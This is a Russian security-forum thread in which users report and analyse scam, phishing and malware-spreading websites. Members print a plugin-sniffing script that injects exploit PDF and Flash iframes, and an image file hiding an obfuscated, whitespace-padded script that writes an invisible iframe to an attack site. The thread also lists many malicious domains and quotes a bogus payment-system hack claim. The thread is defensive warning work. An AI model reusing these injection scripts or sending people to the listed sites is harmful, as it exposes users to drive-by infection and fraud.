# Форум на русском языке  > Угрозы информационной безопасности  > Спам и мошенничество в сети  >  Взгляните на сайт :)

## valho

Не пойму немного, захожу из фарефокса открывается один сайт - какие то оплачиваемые опросы, захожу под IE открывается другой сайт-лохотрон, так же если в фарефоксе применить IE Tab, адрес 
ххтп://www.moneymakermethod.com/ это для разных браузеров такая мода терь идёт открывать разные сайты?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## senyak

У меня открывается все время один и тот же сайт - платные опросы. Хотя и тот лохотрон скорей всего

----------


## valho

в ие очистил все куки, временные файлы и тоже второй перестал открываться, а открывалась полная копия вот этого сайта хттп://ru.cashgenerationpro.com

*Добавлено через 17 минут*

кажется догадываюсь что могло быть, сегодня пробовал одну бяку reghelper.com программа якобы чистит реестр, но инсталил её через сандбокс, она там стока всяких записей в реестре сделало что видимо сандбокс их не удалил после команды убить всё, видимо всё таки бяку какую нить вставили, надо было на виртулке делать...

----------


## senyak

Какая страшная программа. Очень напоминает фальшивых антивирусов. Стремный сайт...
http://www.siteadvisor.com/sites/reghelper.com

----------


## valho

Ну вощем это не из-за бяки этой оказалось, это от гугла так, на сайте вебоборона  :Smiley:  эта реклама, по ней кликнул и ссылка хттп://www.moneymakermethod.com/2743/0/ru?gclid=CIWos4bY7JgCFYST3wodOg-Y0w пока не очистишь куки он так и открывается как обыкновенный сайт

----------


## valho

Вот ещё - хттп://www.how2earnmoney.net/2743/0/ru?gclid=CLT6p_3pjpkCFQ6T3wodbnXTaA
куки стираешь и заходишь по хттп://www.how2earnmoney.net то совсем другой сайт открывается

----------


## senyak

хттп://lesionka11.narod.ru/vkontakte.htm - для вконтакте. Тырит пароли

----------


## priv8v

> хттп://lesionka11.narod.ru/vkontakte.htm - для вконтакте. Тырит пароли


оттуда больше всего вот это понравилось:


```
<input type=hidden name="login" value="лох в контакте">
```

----------


## senyak

Еще одна программка. Инструкция:



> Хотите скачать программу по подниманию рейтинга??
> Она поднимает рейтинг на 10% в день!!!
> *-выключаем антивирус*
> -включаем контакт
> -включаем прогу
> И ждём!!!


http://www.virustotal.com/ru/analisi...73f697215a66ef
Фаил лежал на дипозите, жалобу уже отправил им

*Добавлено через 7 минут*

Можно проверить вот этот сайт - хттп://10let.mail.ru/view/poetry/1386
Что-то странный он. Точней, меня перекидывает сразу на маил.ру

----------


## priv8v

ну по ходу дела это просто субдомен. не думаю, что у них там что-то может быть намеренно вредоносное

----------


## senyak

Отправляю жалобу на файлы, кот. залиты на дипозит. Саппорт дипозита отвечает по трем запросам:



> Здравствуйте, пожалуйста, обратите внимание, что файлы на сервис DepositFiles закачивают пользователи сервиса,
> пожалуйста, адресуйте Ваш вопрос тому, кто Вам дал ccылку на файл


Им уже лень удалить вирусы со своего сайта

----------


## valho

Чёт начинает уже это всё раздражать... маленькие дети какие то, в голове одни опилки, пока мне не очень известное - доргены (http://ru.wikipedia.org/wiki/%D0%94%...B3%D0%B5%D0%BD), буксы, смс, продажа всякого барахла, какие то глупые скандинавские аукционы, с 10-ю наименованиями товара, вместо ста тысяч, как на более менее нормальных и прочая дребедень...у меня мозК скоро сам опилками покроется от всего этого

----------


## priv8v

ну доргены это скорее механизм черного сео, чем мошенничество...

----------


## valho

> ну доргены это скорее механизм черного сео, чем мошенничество...


Так и понял, по моему совсем бесполезная вещь



> Раз вы пришли на этот сайт, значит вы дорвейщик, либо агент гугла. Так это или иначе, но Здравствуйте.


lezzvie.ru/rb

----------


## senyak

При заходе на сайт www.volkswagen.ua Firefox выдала это: 



> Имеется информация о том, что сайт www.volkswagen.ua используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.


Как это так? Сайт то официальный...

----------


## ScratchyClaws

официальные сайты тоже ломают...

----------


## valho

> При заходе на сайт www.volkswagen.ua Firefox выдала это: 
> 
> Как это так? Сайт то официальный...


Нет! Это лохотрон
Хотя пока сори, у меня скорость инета 1 кб в секунду сложно разобраться
Ну да так и есть, по крайне мере nserver относится к volkswagen.de у него, вроде официальный получается  :Smiley:  только он какой то недоразвитый, я имею ввиду что его можно будет заблочить в воте и в веб секьюрити совершенно спокойно  :Diablo:

----------


## valho

Как раз в тему, три в одном.
 Очень долгое время было несколько сайтов 108usd.ru, онлизаработок.ру не помню как его там по нормальному, два этаких близнеца одинаковых, там предлагалось как обычно чего то регистрировать, помогать порно-гигантам рекламой, ну вощем денег переводишь 2000 рублей и досвидания.   Порногигантами были тоже два сайта построенные из бесплатного шаблона хтмл страниц под номерами с 1 до 92 чтоль, заходишь на последнюю страницу и те там 9000 рублёв лежит на счёте. И что я тут заметил? Что сайтов этих на данный момент нет, а вместо этого появляется какая то компашка про инвестиции, это хайп пирамида, работающая по схеме понзи.

----------


## valho

Взгляните на сайт izdmedia.ru, если кому не лень скажите что вы про него думаете, а потом я кое что покажу

----------


## ScratchyClaws

> Вакансия Наборщик текстов на дому. 
> Требования:
> 
> Ответственность 
> Исполнительность 
> Уверенный пользователь ПК, знание офисных программ; 
> - Доступ к Интернету; 
> - Быстрый набор текста; 
> - Возраст от 15 лет. 
> ...


?

----------


## valho

> ?


На ящик пришло к одной знакомой.
Определить конечно трудновато что это.




> Registrant Contact:
>    DomainsReg, Inc.
>    Sergey Astakhov [email protected]
>    1-800-716-0023 fax: 1-800-716-0023
>    Lenin str. 38, 77
>    Saratov Saratovskaya oblast 150040
>    cn


  -



> Здравствуйте Уважаемый Соискатель.
> 
> Меня зовут Елена Александровна Я - Менеджер по подбору удаленного 
> персонала Издательского дома "Медиа".
> В связи с увеличением работ мы проводим набор сотрудников для
> удаленной работы на дому. Набор сотрудников ограничен.
> 
> Мы  Вам предлагаем  трудоустройство по Вакансии: Наборщика Текстов на Дому
> 
> ...


Лохотрон!

Совсем забыл сказать, наверно в сотый раз!!!! Если мне понадобится такое самому, то я могу дать объявление про набор текстов или там сбор всякой ерунды, наподобие ручек и т.п., то мне очередь выставится, если например я дам адрес своей квартиры, в пару миллионов человек... :Smiley:

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## ScratchyClaws

мда... собственно я текст с их сайта копировала, он в разделе *вакансии* висит.

кстати есть ещё один лохотрон, связанный с набором текстов. Скажем мне нужно набрать энное количество страниц рукописного текста. Я могу повесить объявление о вакансии, скажем, секретаря-референта и предлагать кандидатам набирать текст (типа скорость печати и компьютерную грамотность проверяю) и подсовывать листы этого текста. или разослать по инету *кандидатам* как тестовое задание. После того, как я соберу в электронном виде весь свой текст - *всем спасибо, все свободны*

----------


## PavelA

А в конце 80-х годов была работа по разборке толстых журналов. Тебе присылали весь одним архивом, а ты должен был разобрать на статьи. Потом отправляешь. Деньги за это платили.

----------


## valho

> мда...  собственно я текст с их сайта копировала, он в разделе *вакансии* висит.


Всё правильно  :Wink:

----------


## Jolly Rojer

> А в конце 80-х годов была работа по разборке толстых журналов. Тебе присылали весь одним архивом, а ты должен был разобрать на статьи. Потом отправляешь. Деньги за это платили.


Павел не стоит забывать это было в далекие 80е  :Wink:  Той страны уже не существует... а в этой можно делать все, что не запрещено и то если запрещено, но очень хоца то тоже можно, но аккуратно  :Wink:  Поэтому и мошенничество процветает...

----------


## valho

Набрёл на очередной сайт проверить свой IQ, благо их в рекламе от гугла полным полно светится, пощёлкал просто так без ответов и что вы думаете? Тест бесплатный!
Лень было проверять, но если вроде щёлкать просто так то результат выдают без отправки смс IQ 67-69, а если отвечать что я и сделал 1 раз то требуется отправка смс  или там просто дырявые скрипты, как обычно у них все такие. testiq.su/result.php

----------


## priv8v

возможно, сделана проверка по времени выполнения теста  - если время очень короткое (потраченное на выполнение заданий), то результат будет отображен, иначе - запросит смс. Также возможна проверка по iq - если он слишком низкий, то значит угадывалось все - тоже вывести результат без отправки смс, но это маловероятно.

----------


## valho

Ну я например сначала ничего не делал и просто жал далее то показал IQ 67, потом стал на все вопросы нажимать - ааа и IQ был 69. 
 Хотя они все любят на таких сайтах показывать фотки Перис Хилтон с надписью IQ 60, и чтож получается, если у мя ща кошка пощёлкает по клаве то она будет умнее чем Хилтон или такой IQ в 60 у них считается если можешь кнопку далее нажать значит ещё не всё потеряно?  Хотя похоже что всё таки проверка по времени

----------


## valho

Вот ещё один хитрый сайт myblog.wmsite.ru, на первый взгляд тоже ничего подозрительного не видно.
А вот собственно весь развод, чёт много понаписано там что я даже не могу всё дочитать sotomillion.web-box.ru (уже убрано, суть была в том якобы есть один сайт (myblog.wmsite.ru) где можно выиграть денежку отправив смс в какую то копилку, теперь лохотрон поменялся немного, прибавился другой), миллионеры у нас ходят ныкаются по углам, имеют сайты на бесплатном хостинге и выставляют свои шаблонные странички... :Cheesy: 
Мдя



> *Copyright ©                    Счастливая жизнь, 2009*


С того момента пока я обнаружил этот сайт и на данный момент, то есть 3 часа там были переводы 24 раза

----------


## TOsha

хттп://wwww.2217.com:81/html/hcb.html?pid=15&mid=2309&cid=-1&clientid=1237884516&channel=1&stn=wAle$$IywF&ext  ra=-1
Окошко вылазит раз сутки. Окончание может быть разным. Посмотрите? Вроде поганок на компе быть  не должно - винде месяц, антивирь стоит и обновляется регулярно...
P/S/ в начале действительно 4 "w"

----------


## valho

Чёт так ничё и не понял, вроде всё одно и тоже и у меня заходит на сайт только когда скрипты выключены.
Вместо этого я его посмотрел (только ради любопытства ) -



> Discovered open port 80/tcp 
> Discovered open port 1863/tcp MSN (Глюк)
> Device type: storage-misc|firewall|VoIP phone|printer
> Running: Adaptec embedded, Fortinet embedded, Linksys Linux 2.4.X, Netgear embedded, Secure Computing Linux 2.4.X, Xerox embedded
> OS details: Adaptec Snap Server 520 NAS device, Fortinet FortiGate-60 firewall, Linksys NSLU2 NAS device running Unslung 5.8 (Linux 2.4.22), Netgear SPH200D VoIP phone, Secure Computing SnapGear SG565 firewall (Linux 2.4.31-uc0), or VMware ESX Enterprise Server 3.5, Xerox WorkCentre Pro 265 multifunction printer


*Добавлено через 2 часа 24 минуты*

По неграмотности  :Smiley:  даже не знаю что это может быть. У него стоит сервер Adaptec Snap, беспроводная сеть, беспроводный телефон для звонков по скайпу, МФУ и платформа виртуализации как понял, похоже что это чейто офис

----------


## TOsha

У мене там вылазит страничка с какой-то детской задачкой, всё на китайском языке.
Похоже предлагают что-то выиграть (нарисованы нока н95, ай-под, фотики, принтер).
всвязи с незнанием китайского - ничего конкретнее сказать не могу. Но именно на этом компе один раз в сутки. Открывается доп. вкладка в мозиле и вылазит новая задачка. Для подключения использую сотовый, на других компах такого нет...

----------


## senyak

evpanet.com - через секунд 10 перекидывает на порно сайт. Аваст ругается на сайт как (evpanet.com): HTML:Iframe-inf
Есть что-то опасное?

----------


## valho

> evpanet.com - через секунд 10 перекидывает на порно сайт. Аваст ругается на сайт как (evpanet.com): HTML:Iframe-inf
> Есть что-то опасное?


Это может быть червь, наверно стоит проверить сам компик  :Smiley:  на всякий случай, но сайт вроде там нормальный

_Добавлено_

Что то на этом сайте появился какой то странный линк, вчера его вроде не было 


```
ru98.biz/cgi-biz/wtsin.cgi?=9
```

чёт туда не пускает - веб узел отклонил запрос на отображение этой страници

_Добавлено_

Пока что, немного покопавшись, нашёл маленькие кончики на всё это безобразие ведущие на *gugla.net* (точный адрес, а то шифруются, *gugla.net/cgi-bin/wtsmembers.cgi?addseller*). Похоже что всё таки сайт *evpanet.com* можно считать потенциальным распространителем вредоносного ПО.

----------


## priv8v

полазал по ру98.биз и нашел там такой интересный скриптик:



```
<script>

function pdfswf()
{
	try
	{
		for(i = 0; i <= navigator.plugins.length; i++)
		{
			name = navigator.plugins[i].name;

			if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
			{
				document.write('<iframe src="cache/readme.pdf"></iframe>');
			}

			if(name.indexOf("Flash") != -1)
			{
				document.write('<iframe src="cache/flash.swf"></iframe>');
			}
		}
	}

	catch(e){}
}

pdfswf();

</script>
```

 :Smiley: 
на файл pdf ругается вирустотал вот так:
http://www.virustotal.com/ru/analisi...39f56ea5062862

Теперь думаем где там на сайте находиться этот скрипт :Smiley: 
А на свф говорит, что чистый)

----------


## senyak

*priv8v* - а че это значит? Что делает этот скрипт?

----------


## priv8v

делает перебор плагинов (цикл). если находит акробат ридер - выдает файл pdf, если находит Флэш - выдает файл swf

----------


## senyak

Скасибо! Провайдер уже исправил свой сайт, уже Аваст не ругается. Кто-то режил взломать...

----------


## valho

Ну слава богу, разобрались, а то думал что у мну уже глюки если бы никто не ответил 

*Добавлено через 2 часа 10 минут*




> У мене там вылазит страничка с какой-то детской задачкой, всё на китайском языке.
> Похоже предлагают что-то выиграть (нарисованы нока н95, ай-под, фотики, принтер).
> всвязи с незнанием китайского - ничего конкретнее сказать не могу. Но именно на этом компе один раз в сутки. Открывается доп. вкладка в мозиле и вылазит новая задачка. Для подключения использую сотовый, на других компах такого нет...


Хм... Это... Скажите пожалуйста какой сотовый, может что удастся раздобыть... :Smiley:

----------


## sabello

Посмотрите пожалуйста сайт хттп://www.vf-guse.ru ребята недавно сделали,а он уже вроде как заражён.

КIS кричит на заражённый скрипт: 29.03.2009 12:42:50 хттп://www.vf-guse.ru/templates/it_tribune/js/mootools.php//mootools	Opera Internet Browser	Запрещено: HEUR:Trojan-Downloader.Script.Generic

 проверил ссылку DrWeb-om чисто.Подскажите в чём проблема?

----------


## valho

PUA.Script.Packed-2 похоже что глюк, совпадение с сигнатурой какого нибудь трояна, подождите пока кто нибудь ещё ответит  :Smiley:

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Kuzz

> хттп://www.vf-guse.ru/templates/it_tribune/js/mootools.php//mootools	Opera Internet Browser	Запрещено: HEUR:Trojan-Downloader.Script.Generic


Там есть 


> eval(function(p,a,c,k,e,r){e=function(c)


так что Generic-реакция понятна..

----------


## senyak

Кто что знает об http://vkontakte-rating.com сайте? Особенно интересуют программы, которые на нем. Есть ли там вирусы? Так как в них надо вводить логин и пароль...

----------


## Гриша

Хотел посмотреть программу для поднятия рейтинга, но чтобы узнать пароль на архив нужно отдать копеичку  :Smiley:

----------


## senyak

VkontakteRatingMaste? Я скачал, но пароля на архиве нет. Правда качал не с этого сайта

----------


## Гриша

Да... обычно это GUI-троян...

----------


## valho

> Кто что знает об _http://vkontakte-rating.com сайте? Особенно интересуют программы, которые на нем. Есть ли там вирусы? Так как в них надо вводить логин и пароль...


У меня показывает авира что вирусы HTML/Infected.WebPage.Gen
---
Внимание! Лохотрон

----------


## Torvic99

Вот один чел искал через гуглю сайтец одноклассников и нод мне сообщил 
IMON - Интернет-монитор Инициирована программная вирусная тревога на COMP13:  hттp://odnoklassniki.co.ua/ инфицирован HTML/TrojanClicker.IFrame.NAG троян.

----------


## valho

> Вот один чел искал через гуглю сайтец одноклассников и нод мне сообщил 
> IMON - Интернет-монитор Инициирована программная вирусная тревога на COMP13:  hттp://odnoklassniki.co.ua/ инфицирован HTML/TrojanClicker.IFrame.NAG троян.


Странные корни у них - Japan

----------


## senyak

> Хотел посмотреть программу для поднятия рейтинга, но чтобы узнать пароль на архив нужно отдать копеичку


http://files.mail.ru/JMXL8H - без пароля на архив

----------


## valho

Они себе зарабатывают на платных файлообменниках и на этих глупых смс, проги эти все пустышки, ещё там нашел для взлома вконтакте, якобы брут, указал перебор из текстового файла только свой пароль, байда полная...

*Добавлено через 1 час 6 минут*

Вот ещё, поржать можно grandpro-line.com
http://www.flickr.com/photos/3668319...22957/sizes/o/
Контакты для связи крутые  :Smiley: 



> Директор компании: adminXgrandpro-line.com
> Поддержка: supportXgrandpro-line.com


Ещё пару дней назад там был фальшивый обменный пункт
http://www.flickr.com/photos/3668319...29693/sizes/o/
На него зазывали объявлениями о заработке на разнице курсов валют в разных обменниках, при обмене на нём, деньги пропадали навсегда, их много таких

----------


## valho

Похоже паук "съел" другого паука
1 что сейчас
2 что там было

----------


## senyak

хттп://hot-girl-sex-tube.com/ - там явно вирус, в виде кодека
http://www.virustotal.com/ru/analisi...8bf2f66fb351bc

----------


## valho

> хттп://....../ - там явно вирус, в виде кодека
> http://www.virustotal.com/ru/analisi...8bf2f66fb351bc


Опасно!
Exploit: Trojan Fake Codec
This appears to be a fake codec. An increasingly common ploy is to offer to play a free video, and then to tell you that your computer cannot display the video, and needs a new codec, and 'Click here for the new codec'. The victim is prompted to install the codec, and sometimes gets to see the video, and sometimes doesn't, and usually is able to uninstall the 'codec'. What the victim doesn't realize is that it usually leaves behind a rootkit.
---
Интересно, это значит у импортных давно всё есть, а у нас если такое встречаешь то никаких предупреждений в помине нет

*Добавлено через 28 минут*

Запустил этот файлик, далее пошла загрузка с IP 195.88.80.207 (Латвия)  ещё одного -  XPAntivirus, далее этот антивирус будет говорить что у вас не всё трали-вали с системой и так до бесконечности пока не сопрут с компика всё что им нужно...

----------


## senyak

А какой у Вас антивирус? Кстати, эту ссыдку взял с русского форума Авиры. Там боты каждую минуту регятся

----------


## valho

> А какой у Вас антивирус? Кстати, эту ссыдку взял с русского форума Авиры. Там боты каждую минуту регятся


Старый симантек корп 10.1.7.7000 и ещё avg exploit link scanner, мне его здесь на форуме подсказали

*Добавлено через 11 минут*

Вот что это было (XPAntivirus) http://www.prevx.com/filenames/X2847...S2009.EXE.html

*Добавлено через 25 минут*

Вот логи этой хадости MSAS2009.EXE http://www.virustotal.com/analisis/f...03fc26c77076e8
вот картинка - 

что то у мя такое подозрение что сандбокс мой компик спас только наполовину

----------


## wowka

У знакомой увели аську и периодически, с ее номера получал ссылочки на закачку СкринСейвера с пинчем. Но тут стали приходить ссылочки на картинку с
http://yehoshua-m.com/images/
auto.gif

Если взглянуть во внутрь, оказывается, что gif это просто текстовый файл (Первый символ в файле auto.gif шестнадцатеричное 0A)



> <img src="WorleyVision5.jpg">                                                                                                                                                                                    <script type="text/javascript">document.write('\u003c\u0069\u0066\u00  72\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d  \u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u  0066\u006f\u0072\u006b\u0061\u002e\u006f\u0072\u00  67\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072  \u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u  0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u00  69\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f  \u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u  0072\u0061\u006d\u0065\u003e')</script>


WorleyVision5.jpg - обычная картинка лежащая в каталоге. Вопрос, что творит этот джаваскрипт? (NoScript не дает его выполнить)


P.S. Интересно, что между jpg картинкой и текстом скрипта, туева хуча пробелов (т.е. просто жамкнув на просмотр, кода не видно)

----------


## Kuzz

> Вопрос, что творит этот джаваскрипт? (NoScript не дает его выполнить)


Он дописывает и-фрейм на сайт, который



> Имеется информация, что этот сайт атакует компьютеры!

----------


## wowka

> Он дописывает и-фрейм на сайт, который


А у меня как партизан молчит

----------


## Kuzz

> А у меня как партизан молчит


Так NoScript не дал дописать и-фрейм - браузер и не пошел туда.
Потому и молчит

----------


## valho

Эксплоит: MDAC (вроде)
xxx.com/images/auto.gif
С xxx.org/stats/ru1.php
---
Чёт куда то сгинул последний линк, уже пусто там  :Sad: 
---
Теперь там другой эксплоит: pdf

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## wowka

Ведь можно же отслеживать, откуда пришел посетитель/
Скажем если с virusinfo.info - то скрипт, чистит свои следы  :Smiley: ? (хотя больно заумно так)

----------


## valho

Нет, это так не делают, обычно по IP адресам такое распространено, у особо хитрых или по регионам если не ошибаюсь, не думаю что там такие есть, лень проверять...

----------


## NMF

очередной фишинг вконтакте vkortakt . ru

будьте внимательны!!

----------


## Kuzz

Все тот же action="log.php"
Как и тут

----------


## senyak

Еще один - хттп://yougold.xaker.ru/ а с него перебрасывает на  хттп://pashadurov.ru/
Но этот хоть сделай более с умом

----------


## valho

XXX-exploit.ru
(глядеть не стоит)
На сайте эксплойты для foxit reader, чёт впервой такое вижу
пробивают IE конечно конкретно, если всё стоит по умолчанию
http://securityresponse.symantec.com...032414-2531-99

----------


## senyak

Касперский не пикнул. Foxit reader стоит, но вроде ничего не случилось

----------


## valho

Касперский не определяет, ссылки глубоко зарыты, так что не дам пока  :Smiley: 
http://www.virustotal.com/analisis/b...70b366df9a903b

*Добавлено через 1 час 31 минуту*

Ну лана пойдёт...



> В присланном Вами файле обнаружено новое вредоносное программное обеспечение. 
> Его детектирование будет включено в очередное обновление антивирусных баз. 
> Благодарим за оказанную помощь.
> 
> Exploit.Win32.Pidief.asa


*Добавлено через 27 минут*

Как понял, эксплоит сделан для версии Foxit reader до версии 1506, win xp sp3, а для висты так и не понятно пока как там, они немного другие...

----------


## senyak

хттп://lesionka11.narod.ru/vkontakte.htm - опять Вконтакте

----------


## valho

На первой картинке продажа неработающего антивируса с вирусами ( pestguardian.com/index.asp?domain= ), на второй картинке тесты продолжительности жизни, якобы, потом будет просить отправить смс ( lifoff.ru, health-testing-service.ru других 50 адресов не припомню )
Найдите 10 отличий

----------


## bolshoy kot

_http://www.qeqeqe.ru/software/ruversionV-23.html
Бред какой-то  :Smiley: 
Вроде бы ставит FieryAds, программу которая была на сайтах с книгами, это Adware.

----------


## valho

> _http://www.qeqeqe.ru/software/ruversionV-23.html
> Бред какой-то 
> Вроде бы ставит FieryAds, программу которая была на сайтах с книгами, это Adware.


auauau.ru
то же самое
http://www.virustotal.com/analisis/f...228b85c2f5ba85
Там внутри трояны,
http://www.virustotal.com/analisis/1...ce457856b871ff тоже не определяются, но это примерно
Trojan-Spy.HTML.Smitfraud.c [Kaspersky], Phish-BankFraud.eml.a [McAfee], Trj/Citifraud.A [Panda Software], generic5 [AVG]

----------


## valho

money-mark.com
Мдя, это что то...
Обещает что все будут зарабатывать по 450 000 р. в месяц сидя у компьютера дома.
Это какой то новый лохотрон, примерно как волшебные и золотые кошельки при переводе якобы сумма возвращается чуть больше.
Писанины там конечно очень много...



> Совсем недавно в платежной системе RBK Money (она же бывшая RuPay) появилась и пока еще действует новая серьезная брешь, основанная на бажженом SQL-запросе к БД RBK! И опять дырка связана с тем, что нашлись люди, которые узнали номер RU-кошелька, являющегося системным RU-кошельком RBK и выполняющего роль связующего во всех мелких денежных операциях между участниками системы с расширенным уровнем доступа и начальной датой регистрации более 7-и дней! Кто "не в танке" знает, что в ноябре 2007 года этот номер закрыли (после того как RuPay прознала о баге) и заместо него появился новый.





> Но сотрудники RBKMoney ошиблись в одном - они закрыли одну дыру: перепрограммировали транзитный счет, с которого люди черпали деньги. Но не до конца прикрыли SQL-уязвимость, которая помогла в прошлый раз прознать про секретный RU-номер! И вот наконец-то настал этот долгожданный момент (которого я лично ждал с большим нетерпением) - его тоже вычислили! Снова появилась возможность легкого заработка. И, по моим прогнозам, она продлится, как минимум, около года (пока и этот кошелек не закроют).


Интересно чья там фотка напечатана, а то по репке этому человеку точно могут настучать встретив на улице

*Добавлено через 4 часа 6 минут*

ikonapis.com
Иконы




> Работа проститутки Новосибирска, конечно же, никогда не поощрялось в обществе. Ведь общество против свободных сексуальных отношений, тем более за деньги. Более того, на секс ради удовольствия тоже пытались наложить запрет. Проститутки днём неприметны. Часто девушки посветивши себя проституции стремятся выглядеть как можно незаметнее: не одевают мини-юбок и даже не пользуются косметикой.
> 
> Встретив вполне обычную и не очень приветливую девушку на улице, Вы не сможете обнаружить в ней проститутку. Работницам интим досуга хватает общения на работе, в своей личной жизни они очень тихие и не вызывающие. Элитные проститутки больше похожи на преуспевающих деловых леди. Их интим услуги пользуются в Новосибирске большим спросом.
> 
> У 25% девушек проституток Новосибирска есть ребенок, порой и не один. Высшего образования, востребованного работодателями, у проститутки Новосибирска. Девушки вынуждены проститутки искать заработок на панели, совершенствуя профессию проститутки. Очень часто девочки объединяются в группы и снимают квартиру на несколько человек. Так проще выживать, воспитывать детей, ведь на счастливое замужество и семейный уют проститутки не рассчитывают.
> 
> Не все проститутки Новосибирска так удачливы, выполняя работу проститутки, некоторым удается сполна удовлетворить желания клиента, что спустя некоторое время клиенты признаются в любви... и даже предложил жениться. Мечты девушек сбываются... она становятся женами богатых, состоятельных.


Не пойму зачем это?
---
Разобрался в начеле линк "проститутки Новосибирска" на бордель, совсем уже совести нет...

----------


## senyak

http://wm-casher.com/ - подделка или честный сайт?

----------


## Vagon

Баранка жёлтая,а категория - спам http://www.mywot.com/ru/scorecard/wm-casher.com
http://www.google.com/search?hl=ru&q...e&lr=&aq=f&oq=

----------


## valho

> Баранка жёлтая,а категория - спам


Убрал это, удалось связаться с ними. Всё что они мне ответили это было слово - да. Это плЁхо так делать. На спам есть только подозрение именно на этот ресурс ботами на форумах, а так у них ещё сайты есть
wmcasher.ru  wm-casher.ru . Понаделают тут, понимаете, кучу сайтов на одном IP...
--
icq-confirm.info угон асек

----------


## valho

wmr2.z-mega.ru

----------


## priv8v

> а так у них ещё сайты есть
> wmcasher.ru wm-casher.ru . Понаделают тут, понимаете, кучу сайтов на одном IP...


ага. как минимум еще вот эти висят на 91.197.162.210:

avtocasher.com 
buyskype.ru 
cashexpress.ru 
mastercasher.com 
obmenhelp.ru 
sms-obmennik.ru 
sms.wm63.su 
smsobmennik.ru 
vipcasher.com 
wegods.ru 
wewm.ru 
wm-casher.com 
wmcasher.ru 
webofis.us
wm63.su

Считаю, что большая часть этих сайтов (если не все) - кидалы. Наугад зашел на один из них (sms-obmennik.ru). Сбоку надпись на их сайте, про то, что у них вебмани аттестат регистратора, идем по ссылке и затем смотрим наличие жалоб на этот вмид:
Вначале сюда по ссылке с сайта (искать на мониторе слева):
http://passport.webmoney.ru/asp/cert...d=180132313078
Затем отсюда смотрим на 20 жалоб в арбитраже:
http://arbitrage.webmoney.ru/asp/cla...d=180132313078

Причем этот чел владелец 100% и сайта wmcasher.ru - т.к видим это имя в инфе по ссылке выше.

----------


## valho

Номера для обмена интересные есть - 4460 http://virusinfo.info/showthread.php?t=36663 3649 http://virusinfo.info/showthread.php?t=30664 ещё до этого догадки по поводу самой вебмани у мя были очень неприличные, пока...



> Дата регистрации в системе: 	9 Сентября 2008 года


Вспомните кто нить когда стал аврал со всякими порно-информерами и заблоченными компиками, может это конечно совпадение или просто одни и теже короткие номерапринадлежат нескольким лицам?

----------


## senyak

Еще Вконтакт хттп://freak-vkontakte.net/id3463673457

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Winsent

> Еще Вконтакт _http://freak-vkontakte.net/id3463673457


Сделать бы ссылку не активной. Касперский ругается на Trojan-Downloader.JS.Iframe.atl

----------


## senyak

Забыл  :Sad:  Кстати, Вас это тоже касается  :Smiley:

----------


## priv8v

> Вспомните кто нить когда стал аврал со всякими порно-информерами и заблоченными компиками, может это конечно совпадение или просто одни и теже короткие номерапринадлежат нескольким лицам?


есть конторы, у которых заключены с операторами договоры. с этими конторами договариваются более мелкие - можете найти в нете много смс-биллингов - это и есть конторы, которые поменьше. С этими конторами уже договариваются - т.е каждый может прийти на их сайт, регнуться и получить себе текст/ы, которые нужно слать на определенные номера, что бы получать с этого деньги. Выгода налицо. А выгода этим мелким конторам - тоже, т.к они получают с этого в 30-50%.
Ситуация примерно такая.
Это для справки.

----------


## valho

podarki-vip.t35.com



> Добро пожаловать на сервис подарков ВКонтакте.ру
> С помощью этого сайта Вы можете послать любому пользователю ВКонтакте подарок!


Тырит пароли
---
После ввода логина и пароля просит отправить смс



> Наша услуга платная.Для того чтоб ваш подарок был отправлен,
> вам нужно отправить сообщение с текстом
> 40956 пробел 1292425 на номер 3649 или 1171 (Россия).
> 40956 пробел 1292425 на номер 9915 (Казахстан).
> w47120 на номер 3269 (Украина)
> В обратном смс вам прийдёт код. Нажмите кнопку послать, и введите код который вам пришёл по смс. Ваш подарок будет отправлен. Стоимость смс символическая 1 руб или 0.3 грн. Это сделано для того чтоб отличить человек вы или бот программа!

----------


## kekezor

:"http://": loverr-messager.narod.ru/?18361_980161
Такая ссылка пришла в контакте другу (через анонимные признания). В принципе, по доменному имени можно догадаться, что это спам с большой вероятностью, просто интересно проверить, что там по ней. Вдруг вредонос какой.

----------


## valho

Кроме баннера milionerov.net и какой то фотки непонятной ничё больше нет...

----------


## valho

vkotngte.ru



> Этот сайт ворует пароли от сайта вконтакте.ру! Владельцу сиго творения желаю быть заживо погребённым и сгореть в аду!

----------


## bolshoy kot

_ttp://superanti.com/?gclid=CLOCwoO6rJoCFYQI3wodVWVycA
Реклама гугла привела туда...

----------


## Kuzz

> _ttp://superanti.com/?gclid=CLOCwoO6rJoCFYQI3wodVWVycA
> Реклама гугла привела туда...





> Хотите скачать антивирус Avast?
> Тогда отправьте SMS с текстом <ля-ля-ля> (без пробелов!)


Как-то так

----------


## bolshoy kot

> Как-то так


Ага:



> Хотите скачать антивирус Avast? 
> Тогда отправьте SMS с текстом 85super (без пробелов!) 
> на номер в зависимости от своей страны 
> (смотрите ниже номера и страны). 
> В ответ вы получите сообщение с кодом доступа.


Платный пиратский контент.
И что самое интересное: реклама сайта была на VirusInfo. Я понимаю, что это реклама Гугла, но все же...

----------


## Kuzz

> И что самое интересное: реклама сайта была на VirusInfo. Я понимаю, что это реклама Гугла, но все же...


По контексту проходит..
А если что не так: http://virusinfo.info/forumdisplay.php?f=28 
Администрация подкорректирует)

Тема о нежелательной рекламе

----------


## valho

key-volga.ru



> Универсальный домофонный мульти ключ – вездеход
